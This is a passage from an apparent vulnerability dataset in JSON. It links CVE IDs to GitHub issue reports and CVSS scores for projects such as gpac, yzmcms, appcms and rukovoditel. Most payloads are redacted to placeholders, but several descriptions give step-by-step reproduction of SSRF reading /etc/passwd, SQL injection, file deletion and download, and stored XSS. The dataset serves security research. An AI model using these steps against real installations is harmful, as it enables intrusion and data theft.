capture in the process of browsing, and you can successfully read the file PATHTAG by visiting URLTAG . FILETAG",
  59991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  59992. "severity": "HIGH",
  59993. "baseScore": 7.5,
  59994. "impactScore": 3.6,
  59995. "exploitabilityScore": 3.9
  59996. },
  59997. {
  59998. "CVE_ID": "CVE-2020-35738",
  59999. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/91",
  60000. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/91",
  60001. "Repo_new": "dbry/wavpack",
  60002. "Issue_Created_At": "2020-12-27T18:52:53Z",
  60003. "description": "APITAG crashes with SEGFAULT. Hello! This bug was found by Crusher (fuzzer developing in ISP RAS), thanks to following colleagues: Akolzin Vitalii, Shamil Kurmangaleev, Maxim Mishechkin, Fedor Nis'kov, Ivan Gulakov, Denis Straghkov, Andrey Fedotov, Alexey Vishnyakov, Daniil Kutz, Alexander Novikov. Product version Commit APITAG (latest commit on master at current moment). Environment Ubuntu NUMBERTAG To reproduce NUMBERTAG Extract APITAG from FILETAG Run: APITAG Program crashes with SEGFAULT. Error message: CODETAG Valgrind output: ERRORTAG Analysis NUMBERTAG In URLTAG malloc 's argument overflows APITAG type and results in small positive number. So, only a short memory region is allocated NUMBERTAG Then URLTAG dptr now points to address in previously allocated region NUMBERTAG Finally URLTAG we write in memory by dptr pointer. But in one moment dptr points to memory outside of allocated region. Segmentation fault.",
  60004. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H",
  60005. "severity": "MEDIUM",
  60006. "baseScore": 6.1,
  60007. "impactScore": 4.2,
  60008. "exploitabilityScore": 1.8
  60009. },
  60010. {
  60011. "CVE_ID": "CVE-2020-35759",
  60012. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/10",
  60013. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/10",
  60014. "Repo_new": "alexlang24/bloofoxcms",
  60015. "Issue_Created_At": "2020-12-27T11:02:09Z",
  60016. "description": "CSRF Attack that leads to edit any file content APITAG I discovered a CSRF Vulnerability in APITAG , the request validation was not there to avoid CSRF Attacks. APITAG : ERRORTAG Impact Change any file content in webserver APITAG Fix Synchronizer Token Pattern URLTAG",
  60017. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  60018. "severity": "MEDIUM",
  60019. "baseScore": 6.5,
  60020. "impactScore": 3.6,
  60021. "exploitabilityScore": 2.8
  60022. },
  60023. {
  60024. "CVE_ID": "CVE-2020-35760",
  60025. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/9",
  60026. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/9",
  60027. "Repo_new": "alexlang24/bloofoxcms",
  60028. "Issue_Created_At": "2020-12-27T10:31:18Z",
  60029. "description": "Authenticated Unrestricted File Upload in 'profile' action. I found Unrestricted File Upload in APITAG > filename param, the filename param only checks the MIME type which that can be bypassed. APITAG : CODETAG Impact Upload Backdoor PHP Files that leads to control the victim webserver",
  60030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60031. "severity": "CRITICAL",
  60032. "baseScore": 9.8,
  60033. "impactScore": 5.9,
  60034. "exploitabilityScore": 3.9
  60035. },
  60036. {
  60037. "CVE_ID": "CVE-2020-35761",
  60038. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/8",
  60039. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/8",
  60040. "Repo_new": "alexlang24/bloofoxcms",
  60041. "Issue_Created_At": "2020-12-27T09:44:47Z",
  60042. "description": "Authenticated RXSS in 'fileurl' parameter. I found an Authenticated RXSS in 'fileurl' parameter, the 'fileurl' input was not safely sanitized. APITAG : FILETAG URLTAG APITAG Impact The attacker can execute a HTML/JS Code (the attacker can stealing cookies,etc..) Fix Use FILETAG function",
  60043. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60044. "severity": "MEDIUM",
  60045. "baseScore": 5.4,
  60046. "impactScore": 2.7,
  60047. "exploitabilityScore": 2.3
  60048. },
  60049. {
  60050. "CVE_ID": "CVE-2020-35762",
  60051. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/11",
  60052. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/11",
  60053. "Repo_new": "alexlang24/bloofoxcms",
  60054. "Issue_Created_At": "2020-12-27T11:15:54Z",
  60055. "description": "Authenticated Path traversal in 'fileurl' parameter that leads to read local files. I discovered a Path traversal Vulnerability in 'fileurl' parameter, the 'fileurl' input does not avoid (./\\) in user input which that leads to Path traversal Vulnerability. APITAG : FILETAG FILETAG Impact Read local files in webserver",
  60056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  60057. "severity": "LOW",
  60058. "baseScore": 2.7,
  60059. "impactScore": 1.4,
  60060. "exploitabilityScore": 1.2
  60061. },
  60062. {
  60063. "CVE_ID": "CVE-2020-35766",
  60064. "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDKIM/issues/113",
  60065. "Issue_Url_new": "https://github.com/trusteddomainproject/opendkim/issues/113",
  60066. "Repo_new": "trusteddomainproject/opendkim",
  60067. "Issue_Created_At": "2020-12-28T16:05:55Z",
  60068. "description": "Insecure temporary key path /tmp/testkeys. In URLTAG a fixed path under APITAG is used for the test keys. This is not a _huge_ vulnerability, but it is a silly one since it is so well known and easy to avoid: URLTAG Either a random name should be chosen securely, or perhaps the temporary keys should be created within the build directory.",
  60069. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60070. "severity": "HIGH",
  60071. "baseScore": 7.8,
  60072. "impactScore": 5.9,
  60073. "exploitabilityScore": 1.8
  60074. },
  60075. {
  60076. "CVE_ID": "CVE-2020-35850",
  60077. "Issue_Url_old": "https://github.com/cockpit-project/cockpit/issues/15077",
  60078. "Issue_Url_new": "https://github.com/cockpit-project/cockpit/issues/15077",
  60079. "Repo_new": "cockpit-project/cockpit",
  60080. "Issue_Created_At": "2020-12-28T16:28:11Z",
  60081. "description": "unauthenticated server side request forgery . Cockpit version NUMBERTAG OS: Ubuntu NUMBERTAG Page: login User can detect open ssh port or another open ports on server that services Cockpit last version. This is a vulnerability that allows an user send request to internal hosts for detecting open ports. So that firewall configuration can be bypassed or the server can be used like gateway by malicious user. In addition, user induces the application to make an request back to the server that is hosting Cockpit. For example: if system admin creates iptables rule to drop all packets that come to NUMBERTAG port or another port, user can detect whether port NUMBERTAG is open or not. Assuming that there is a iptables rule which port NUMBERTAG is open for APITAG (loopback interface) but is closed for other interfaces CODETAG CODETAG Steps to reproduce: On login panel NUMBERTAG Click Other Options NUMBERTAG Set APITAG to Connect to field and send request with incorrect credentials NUMBERTAG Intercept the request with Burp Suite NUMBERTAG If ssh service is open on port NUMBERTAG and credentials are wrong, server returns NUMBERTAG Authentication Failed\" response NUMBERTAG If user tries connect to a port that accepts data for ssh connection , server returns NUMBERTAG Authentication failed: no host\" response and waits NUMBERTAG seconds NUMBERTAG If user tries connect to a closed port , server returns NUMBERTAG Authentication failed: no host\" response and without waiting NUMBERTAG If ssh service is open on port NUMBERTAG and credentials are correct, server returns NUMBERTAG response: FILETAG FILETAG FILETAG",
  60082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  60083. "severity": "MEDIUM",
  60084. "baseScore": 6.5,
  60085. "impactScore": 3.6,
  60086. "exploitabilityScore": 2.8
  60087. },
  60088. {
  60089. "CVE_ID": "CVE-2020-35918",
  60090. "Issue_Url_old": "https://github.com/tuupola/branca-spec/issues/22",
  60091. "Issue_Url_new": "https://github.com/tuupola/branca-spec/issues/22",
  60092. "Repo_new": "tuupola/branca-spec",
  60093. "Issue_Created_At": "2020-04-06T21:18:10Z",
  60094. "description": "Base NUMBERTAG is actually Base NUMBERTAG The character set provided in the spec: APITAG Only contains NUMBERTAG characters, and is thus a base NUMBERTAG encoding. Looking at the implementations listed on the document, it seems that most of them (if not all) include a z to the character set as I would expect. Is this the intended behaviour? Or should the character set not include the character z ?",
  60095. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  60096. "severity": "MEDIUM",
  60097. "baseScore": 5.5,
  60098. "impactScore": 3.6,
  60099. "exploitabilityScore": 1.8
  60100. },
  60101. {
  60102. "CVE_ID": "CVE-2020-35918",
  60103. "Issue_Url_old": "https://github.com/return/branca/issues/24",
  60104. "Issue_Url_new": "https://github.com/return/branca/issues/24",
  60105. "Repo_new": "return/branca",
  60106. "Issue_Created_At": "2020-11-29T14:04:47Z",
  60107. "description": "Security issue: Panic on invalid base NUMBERTAG encoded tokens. Documentation for APITAG , which also implicitly covers APITAG , states that: > If the input is not in Base NUMBERTAG format, it returns a ERRORTAG Result. Prior to APITAG this was not the case, instead a panic would occur: URLTAG This could leave any validating instance vulnerable to potential APITAG when parsing untrusted data and unexpected panics could occur. This behavior was corrected in URLTAG URLTAG",
  60108. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  60109. "severity": "MEDIUM",
  60110. "baseScore": 5.5,
  60111. "impactScore": 3.6,
  60112. "exploitabilityScore": 1.8
  60113. },
  60114. {
  60115. "CVE_ID": "CVE-2020-35930",
  60116. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/201",
  60117. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/201",
  60118. "Repo_new": "seopanel/seo-panel",
  60119. "Issue_Created_At": "2020-12-30T10:49:42Z",
  60120. "description": "FILETAG After fix i go to request CVE",
  60121. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60122. "severity": "MEDIUM",
  60123. "baseScore": 5.4,
  60124. "impactScore": 2.7,
  60125. "exploitabilityScore": 2.3
  60126. },
  60127. {
  60128. "CVE_ID": "CVE-2020-35970",
  60129. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/53",
  60130. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/53",
  60131. "Repo_new": "yzmcms/yzmcms",
  60132. "Issue_Created_At": "2020-12-14T15:14:20Z",
  60133. "description": "There are SSRF vulnerabilities in background collection management. Log in the background management and create a new node in the collection management FILETAG FILETAG Add our url with the attack code FILETAG FILETAG Then click collect FILETAG Because two methods are written in the source code If you have curl extensions, use curl_ Close function. If not, use file_ get_ Contents function FILETAG And when processing the URL, only the first four characters of the URL are obtained by using the substr function, and whether it is HTTP is judged. If it is, it is checked FILETAG Here, you can use the features of PHP. When PHP encounters an unknown protocol, it will throw a warning and set the protocol to null. When the Protoco is null or file, the local operation will be carried out. By default, the local file operation will be performed if the protocol is not transferred or the protocol does not exist. Therefore, we can use a custom protocol, such as httpxxx, which can start from HTTP, but can't be HTTPS. We can try to read the /etc/passwd file FILETAG Then click collect FILETAG The file was read successfully",
  60134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60135. "severity": "HIGH",
  60136. "baseScore": 7.5,
  60137. "impactScore": 3.6,
  60138. "exploitabilityScore": 3.9
  60139. },
  60140. {
  60141. "CVE_ID": "CVE-2020-35971",
  60142. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/54",
  60143. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/54",
  60144. "Repo_new": "yzmcms/yzmcms",
  60145. "Issue_Created_At": "2020-12-30T09:52:17Z",
  60146. "description": "APITAG NUMBERTAG SS bug. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG Description: In the FILETAG row NUMBERTAG No filtering of the searinfo APITAG xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. FILETAG FILETAG FILETAG FILETAG",
  60147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60148. "severity": "MEDIUM",
  60149. "baseScore": 5.4,
  60150. "impactScore": 2.7,
  60151. "exploitabilityScore": 2.3
  60152. },
  60153. {
  60154. "CVE_ID": "CVE-2020-35972",
  60155. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/55",
  60156. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/55",
  60157. "Repo_new": "yzmcms/yzmcms",
  60158. "Issue_Created_At": "2020-12-30T12:40:28Z",
  60159. "description": "There is a CSRF vulnerability to add users. After the administrator logged in, open the following the page POC: FILETAG APITAG FILETAG Refresh page after opening FILETAG CODETAG",
  60160. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  60161. "severity": "MEDIUM",
  60162. "baseScore": 4.3,
  60163. "impactScore": 1.4,
  60164. "exploitabilityScore": 2.8
  60165. },
  60166. {
  60167. "CVE_ID": "CVE-2020-35979",
  60168. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1662",
  60169. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1662",
  60170. "Repo_new": "gpac/gpac",
  60171. "Issue_Created_At": "2020-12-15T12:02:59Z",
  60172. "description": "APITAG heap buffer overflow in gp_rtp_builder_do_avc APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60173. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60174. "severity": "HIGH",
  60175. "baseScore": 7.8,
  60176. "impactScore": 5.9,
  60177. "exploitabilityScore": 1.8
  60178. },
  60179. {
  60180. "CVE_ID": "CVE-2020-35980",
  60181. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1661",
  60182. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1661",
  60183. "Repo_new": "gpac/gpac",
  60184. "Issue_Created_At": "2020-12-15T12:01:23Z",
  60185. "description": "APITAG heap use after free in gf_isom_box_del APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG NUMBERTAG URLTAG and NUMBERTAG URLTAG . Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60186. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60187. "severity": "HIGH",
  60188. "baseScore": 7.8,
  60189. "impactScore": 5.9,
  60190. "exploitabilityScore": 1.8
  60191. },
  60192. {
  60193. "CVE_ID": "CVE-2020-35981",
  60194. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1659",
  60195. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1659",
  60196. "Repo_new": "gpac/gpac",
  60197. "Issue_Created_At": "2020-12-15T11:57:41Z",
  60198. "description": "A NULL pointer dereference in the function APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60199. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60200. "severity": "HIGH",
  60201. "baseScore": 7.8,
  60202. "impactScore": 5.9,
  60203. "exploitabilityScore": 1.8
  60204. },
  60205. {
  60206. "CVE_ID": "CVE-2020-35982",
  60207. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1660",
  60208. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1660",
  60209. "Repo_new": "gpac/gpac",
  60210. "Issue_Created_At": "2020-12-15T11:59:14Z",
  60211. "description": "A NULL pointer dereference in the function gf_hinter_track_finalize in APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
  60212. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60213. "severity": "HIGH",
  60214. "baseScore": 7.8,
  60215. "impactScore": 5.9,
  60216. "exploitabilityScore": 1.8
  60217. },
  60218. {
  60219. "CVE_ID": "CVE-2020-35984",
  60220. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/4",
  60221. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/4",
  60222. "Repo_new": "r0ck3t1973/rukovoditel",
  60223. "Issue_Created_At": "2020-12-16T01:54:42Z",
  60224. "description": "Store Cross Site Scripting Vulnerability on \"users_alerts\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"users_alerts\" feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'users_alerts NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. APITAG FILETAG FILETAG",
  60225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60226. "severity": "MEDIUM",
  60227. "baseScore": 5.4,
  60228. "impactScore": 2.7,
  60229. "exploitabilityScore": 2.3
  60230. },
  60231. {
  60232. "CVE_ID": "CVE-2020-35985",
  60233. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/3",
  60234. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/3",
  60235. "Repo_new": "r0ck3t1973/rukovoditel",
  60236. "Issue_Created_At": "2020-12-16T01:51:19Z",
  60237. "description": "Store Cross Site Scripting Vulnerability on \"global_lists\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"global_lists\" feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'global_lists NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. APITAG FILETAG FILETAG",
  60238. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60239. "severity": "MEDIUM",
  60240. "baseScore": 5.4,
  60241. "impactScore": 2.7,
  60242. "exploitabilityScore": 2.3
  60243. },
  60244. {
  60245. "CVE_ID": "CVE-2020-35986",
  60246. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/2",
  60247. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/2",
  60248. "Repo_new": "r0ck3t1973/rukovoditel",
  60249. "Issue_Created_At": "2020-12-16T01:46:27Z",
  60250. "description": "Store Cross Site Scripting Vulnerability on \"users_groups\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'users_groups NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG FILETAG FILETAG",
  60251. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60252. "severity": "MEDIUM",
  60253. "baseScore": 5.4,
  60254. "impactScore": 2.7,
  60255. "exploitabilityScore": 2.3
  60256. },
  60257. {
  60258. "CVE_ID": "CVE-2020-35987",
  60259. "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/1",
  60260. "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/1",
  60261. "Repo_new": "r0ck3t1973/rukovoditel",
  60262. "Issue_Created_At": "2020-12-16T01:41:10Z",
  60263. "description": "Cross Site Script Vulnerability on APITAG in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new APITAG NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG NUMBERTAG insert payload module 'entities' FILETAG NUMBERTAG BOOM!!! FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All Version",
  60264. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60265. "severity": "MEDIUM",
  60266. "baseScore": 5.4,
  60267. "impactScore": 2.7,
  60268. "exploitabilityScore": 2.3
  60269. },
  60270. {
  60271. "CVE_ID": "CVE-2020-36004",
  60272. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/2",
  60273. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/2",
  60274. "Repo_new": "source-trace/appcms",
  60275. "Issue_Created_At": "2020-12-18T06:13:11Z",
  60276. "description": "SQL injection vulnerability exists in APITAG required). First, the loopholes should be reappeared, and then the reasons should be analyzed : After logging in the background ,We know that if we need to add an app, we need a key: FILETAG FILETAG So before testing, I need to create a new table in the database and add data . FILETAG The table name is \"app\"_ cms_list\" , It then contains two pieces of data, as shown in the figure. Next, we can visit this link to perform blind SQL injection in the \"now\":(\"dawn\" is the original \"admin\", but the system needs us to change the background name) URLTAG Pay attention to the use of \"+\" instead of \"space\", and unsuccessful words will lead to NUMBERTAG At the same time, remember to log in to the background. FILETAG FILETAG FILETAG Little surprise, we also found that its cookie did not change before and after login, but it was in the header, interesting. Next, we analyze the code : FILETAG We can control them APITAG go to \"get_ List\": Our \"$now\" was handed over to \"$params FILETAG FILETAG FILETAG In any case, our $where is not filtered and goes directly into the SQL statement : FILETAG We follow the \"query\": FILETAG FILETAG FILETAG nice!",
  60277. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  60278. "severity": "MEDIUM",
  60279. "baseScore": 6.5,
  60280. "impactScore": 3.6,
  60281. "exploitabilityScore": 2.8
  60282. },
  60283. {
  60284. "CVE_ID": "CVE-2020-36005",
  60285. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/3",
  60286. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/3",
  60287. "Repo_new": "source-trace/appcms",
  60288. "Issue_Created_At": "2020-12-18T06:18:00Z",
  60289. "description": "I found out in FILETAG After logging in, allow me to delete any APITAG required). First, we find that there is a sensitive function for \"del_resource\" of FILETAG FILETAG We follow it to APITAG FILETAG FILETAG How do we call the \"m__del_resource\" function? FILETAG Good. I already know how to use it : Let's first create a test file FILETAG in the root directory: FILETAG Open burp and pay attention to the data of get and APITAG that you have to log in to the background first: URLTAG FILETAG Click send, it shows failed? FILETAG But when we look at the local files, APITAG has disappeared : FILETAG",
  60290. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  60291. "severity": "MEDIUM",
  60292. "baseScore": 6.5,
  60293. "impactScore": 5.2,
  60294. "exploitabilityScore": 1.2
  60295. },
  60296. {
  60297. "CVE_ID": "CVE-2020-36006",
  60298. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/4",
  60299. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/4",
  60300. "Repo_new": "source-trace/appcms",
  60301. "Issue_Created_At": "2020-12-18T06:22:17Z",
  60302. "description": "I found out in FILETAG After logging in, allow me to delete any APITAG required). In the same (issues NUMBERTAG we found another point : FILETAG FILETAG FILETAG",
  60303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  60304. "severity": "MEDIUM",
  60305. "baseScore": 6.5,
  60306. "impactScore": 5.2,
  60307. "exploitabilityScore": 1.2
  60308. },
  60309. {
  60310. "CVE_ID": "CVE-2020-36007",
  60311. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/7",
  60312. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/7",
  60313. "Repo_new": "source-trace/appcms",
  60314. "Issue_Created_At": "2020-12-18T06:30:01Z",
  60315. "description": "I found Reflective XSS in APITAG required). Of course, we have to log in to the background first. Let's go look at the code, it's very easy : PATHTAG FILETAG payload: APITAG Of course, there are many files with the same problem. FILETAG",
  60316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  60317. "severity": "MEDIUM",
  60318. "baseScore": 6.1,
  60319. "impactScore": 2.7,
  60320. "exploitabilityScore": 2.8
  60321. },
  60322. {
  60323. "CVE_ID": "CVE-2020-36008",
  60324. "Issue_Url_old": "https://github.com/SomeBottle/OBottle/issues/7",
  60325. "Issue_Url_new": "https://github.com/somebottle/obottle/issues/7",
  60326. "Repo_new": "somebottle/obottle",
  60327. "Issue_Created_At": "2020-12-20T03:02:43Z",
  60328. "description": "APITAG NUMBERTAG FILETAG has an arbitrary file write APITAG login\uff09. If you don't think it's important, you can ignore me. The trigger point is here: FILETAG FILETAG We want to enter here, first of all, there are several conditions: APITAG in FILETAG NUMBERTAG FILETAG We first visit the login interface to enter the background: FILETAG FILETAG Then we type payload in the title: APITAG FILETAG Then it will automatically jump to the published page: FILETAG",
  60329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  60330. "severity": "HIGH",
  60331. "baseScore": 8.1,
  60332. "impactScore": 5.2,
  60333. "exploitabilityScore": 2.8
  60334. },
  60335. {
  60336. "CVE_ID": "CVE-2020-36009",
  60337. "Issue_Url_old": "https://github.com/SomeBottle/OBottle/issues/6",
  60338. "Issue_Url_new": "https://github.com/somebottle/obottle/issues/6",
  60339. "Repo_new": "somebottle/obottle",
  60340. "Issue_Created_At": "2020-12-20T02:59:07Z",
  60341. "description": "\\c\\g.php has an arbitrary file download vulnerability. If you don't think it's important, you can ignore me. FILETAG As you can see, we need to go through two levels to get to the castle. These data are not filtered. FILETAG We need to bypass the logic here. What should we do? FILETAG APITAG POC: POST APITAG data: PATHTAG FILETAG",
  60342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60343. "severity": "HIGH",
  60344. "baseScore": 7.5,
  60345. "impactScore": 3.6,
  60346. "exploitabilityScore": 3.9
  60347. },
  60348. {
  60349. "CVE_ID": "CVE-2020-36051",
  60350. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/39",
  60351. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/39",
  60352. "Repo_new": "bg5sbk/minicms",
  60353. "Issue_Created_At": "2020-12-23T06:13:59Z",
  60354. "description": "There is two path traversal vulnerability. post_edit and FILETAG line NUMBERTAG index_file = PATHTAG line NUMBERTAG index_file = PATHTAG post_state is controllable and there is no filtering limit We can use ../ to loop through all files",
  60355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60356. "severity": "HIGH",
  60357. "baseScore": 7.5,
  60358. "impactScore": 3.6,
  60359. "exploitabilityScore": 3.9
  60360. },
  60361. {
  60362. "CVE_ID": "CVE-2020-36056",
  60363. "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/5",
  60364. "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/5",
  60365. "Repo_new": "vivekpanday12/cve-",
  60366. "Issue_Created_At": "2022-01-23T15:03:12Z",
